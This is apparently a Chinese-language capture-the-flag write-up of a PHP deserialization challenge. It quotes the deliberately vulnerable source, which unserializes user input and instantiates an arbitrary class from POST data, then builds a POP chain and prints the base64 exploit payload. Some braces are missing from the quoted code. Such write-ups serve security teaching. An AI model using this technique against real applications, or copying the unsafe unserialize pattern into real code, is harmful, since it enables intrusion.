第四周3

1. 打开环境 php代码映入眼帘

   <?php
   error_reporting(0);
   highlight_file(__FILE__);
   // flag.php
   class teacher{
       public $name;
       public $rank;
       private $salary;
       public function __construct($name,$rank,$salary = 10000){
           $this->name = $name;
           $this->rank = $rank;
           $this->salary = $salary;
    
   class classroom{
       public $name;
       public $leader;
       public function __construct($name,$leader){
           $this->name = $name;
           $this->leader = $leader;
       
       public function hahaha(){
           if($this->name != 'one class' or $this->leader->name != 'ing' or $this->leader->rank !='department'){
               return False;
           }
           else{
               return True;
           }
       
   class school{
       public $department;
       public $headmaster;
       public function __construct($department,$ceo){
           $this->department = $department;
           $this->headmaster = $ceo;
       
       public function IPO(){
           if($this->headmaster == 'ong'){
               echo "Pretty Good ! Ctfer!\n";
               echo new $_POST['a']($_POST['b']);
           }
       
       public function __wakeup(){
           if($this->department->hahaha()) {
               $this->IPO();
           }
       
   if(isset($_GET['d'])){
       unserialize(base64_decode($_GET['d']));
   }
   ?>

2. 代码审计 先看危险点

   echo new $_POST['a']($_POST['b']);
   可以利用原生类注入

   看到魔法函数 wakeup 在反序列化时自动触发

3. 想办构造pop链
   当反序列化时会自动触发wakeup函数 我们需要让：

   if($this->department->hahaha())  
   返回true

   我们要调动classroom类中的hahaha函数：

   if($this->name != 'one class' or $this->leader->name != 'ing' or $this->leader->rank !='department')
   让其返回flase 即可

   我们需要调用teacher类 让该类下的name=ing rank=department 即可

4. 写代码:

   <?php
   error_reporting(0);
   highlight_file(__FILE__);
   // flag.php
   class teacher{
       public $name='ing';
       public $rank='department';
   
    
   class classroom{
       public $name='one class';
       public $leader;
   
    
   class school{
       public $department;
       public $headmaster='ong';
   
   $a=new school();
   $b=new classroom();
   $c=new teacher();
   $a->department=$b;
   $b->leader=$c;
   echo base64_encode(serialize($a));
   ?>
    
   结果：                      
   Tzo2OiJzY2hvb2wiOjI6e3M6MTA6ImRlcGFydG1lbnQiO086OToiY2xhc3Nyb29tIjoyOntzOjQ6Im5hbWUiO3M6OToib25lIGNsYXNzIjtzOjY6ImxlYWRlciI7Tzo3OiJ0ZWFjaGVyIjoyOntzOjQ6Im5hbWUiO3M6MzoiaW5nIjtzOjQ6InJhbmsiO3M6MTA6ImRlcGFydG1lbnQiO319czoxMDoiaGVhZG1hc3RlciI7czozOiJvbmciO30=

   成功获得flag

5.总结：
这个题目考察原生类利用
其他的就是正常的反序列化程序